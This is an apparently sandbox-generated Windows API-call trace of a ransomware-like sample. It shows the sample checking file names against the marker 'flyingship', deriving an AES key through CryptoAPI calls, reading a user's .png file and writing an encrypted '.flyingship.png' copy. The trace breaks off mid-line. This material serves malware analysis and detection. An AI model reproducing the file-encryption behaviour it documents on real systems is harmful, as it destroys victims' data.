cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Pw6nPSJwo.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Pw6nPSJwo.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Pw6nPSJwo.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Pw6nPSJwo.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Pw6nPSJwo.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Pw6nPSJwo.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Pw6nPSJwo.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Pw6nPSJwo.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Pw6nPSJwo.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Pw6nPSJwo.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Pw6nPSJwo.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Pw6nPSJwo.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Pw6nPSJwo.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Pw6nPSJwo.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Pw6nPSJwo.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Pw6nPSJwo.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Pw6nPSJwo.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Pw6nPSJwo.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Pw6nPSJwo.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Pw6nPSJwo.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Pw6nPSJwo.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Pw6nPSJwo.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Pw6nPSJwo.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ctures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Pw6nPSJwo.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Pw6nPSJwo.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Pw6nPSJwo.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="res\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Pw6nPSJwo.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="es\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Pw6nPSJwo.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Pw6nPSJwo.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Pw6nPSJwo.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GX6xg0MP-Oop8LYh\\E hluVFFklat\\Pw6nPSJwo.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X6xg0MP-Oop8LYh\\E hluVFFklat\\Pw6nPSJwo.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6xg0MP-Oop8LYh\\E hluVFFklat\\Pw6nPSJwo.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xg0MP-Oop8LYh\\E hluVFFklat\\Pw6nPSJwo.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g0MP-Oop8LYh\\E hluVFFklat\\Pw6nPSJwo.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0MP-Oop8LYh\\E hluVFFklat\\Pw6nPSJwo.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP-Oop8LYh\\E hluVFFklat\\Pw6nPSJwo.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="P-Oop8LYh\\E hluVFFklat\\Pw6nPSJwo.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-Oop8LYh\\E hluVFFklat\\Pw6nPSJwo.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Oop8LYh\\E hluVFFklat\\Pw6nPSJwo.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op8LYh\\E hluVFFklat\\Pw6nPSJwo.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p8LYh\\E hluVFFklat\\Pw6nPSJwo.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8LYh\\E hluVFFklat\\Pw6nPSJwo.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LYh\\E hluVFFklat\\Pw6nPSJwo.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Yh\\E hluVFFklat\\Pw6nPSJwo.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h\\E hluVFFklat\\Pw6nPSJwo.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\E hluVFFklat\\Pw6nPSJwo.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E hluVFFklat\\Pw6nPSJwo.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" hluVFFklat\\Pw6nPSJwo.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hluVFFklat\\Pw6nPSJwo.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="luVFFklat\\Pw6nPSJwo.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.679] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uVFFklat\\Pw6nPSJwo.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.679] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VFFklat\\Pw6nPSJwo.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.679] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FFklat\\Pw6nPSJwo.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.679] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Fklat\\Pw6nPSJwo.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.679] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="klat\\Pw6nPSJwo.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.679] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lat\\Pw6nPSJwo.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.679] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="at\\Pw6nPSJwo.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.679] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t\\Pw6nPSJwo.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.679] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Pw6nPSJwo.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.679] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pw6nPSJwo.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.679] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="w6nPSJwo.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.679] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6nPSJwo.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.679] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nPSJwo.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.679] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PSJwo.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.679] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0189.679] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0189.679] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0189.679] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0189.679] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0189.679] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ng", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0189.679] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="png", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0189.679] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".png", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0189.679] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0189.679] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0189.679] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0189.679] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0189.679] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.680] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Pw6nPSJwo.png", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbef78b20, ftCreationTime.dwHighDateTime=0x1d5e1b2, ftLastAccessTime.dwLowDateTime=0x13eacf50, ftLastAccessTime.dwHighDateTime=0x1d5e31d, ftLastWriteTime.dwLowDateTime=0x13eacf50, ftLastWriteTime.dwHighDateTime=0x1d5e31d, nFileSizeHigh=0x0, nFileSizeLow=0xb4e0, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="Pw6nPSJwo.png", cAlternateFileName="PW6NPS~1.PNG")) returned 0x90af58 [0189.680] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0189.680] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.680] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0189.680] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.680] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0189.680] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0189.680] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.680] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0189.680] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.680] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.680] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0189.680] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.680] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.681] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c88) returned 1 [0189.681] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0189.681] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0189.682] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0189.682] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0189.682] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0189.682] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0189.689] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.689] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0189.689] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.689] CryptCreateHash (in: hProv=0x9c0c88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0189.689] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0189.689] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.689] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.689] CryptHashData (hHash=0x90ae18, pbData=0x8df0a0, dwDataLen=0x19, dwFlags=0x1) returned 1 [0189.689] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.689] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0189.689] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.689] CryptDeriveKey (in: hProv=0x9c0c88, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90aed8) returned 1 [0189.690] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.690] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.690] CryptDestroyHash (hHash=0x90ae18) returned 1 [0189.690] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Pw6nPSJwo.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\e hluvffklat\\pw6npsjwo.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0189.691] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.691] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0189.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0189.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0189.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0189.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0189.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0189.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0189.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0189.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0189.692] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Pw6nPSJwo.flyingship.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\e hluvffklat\\pw6npsjwo.flyingship.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0189.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0189.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0189.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0189.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0189.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0189.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0189.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0189.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0189.693] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0189.693] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0xb4e0, lpOverlapped=0x0) returned 1 [0189.696] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0189.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0189.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0189.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0189.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0189.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb4e0) returned 0xbea018 [0189.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2480020 | out: hHeap=0x8a0000) returned 1 [0189.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0189.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0189.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0189.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0189.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0189.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb4e0) returned 0xbf5500 [0189.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0189.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0189.697] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0189.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0189.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0189.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0189.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0189.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb4e0) returned 0xbea018 [0189.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0189.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0189.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: 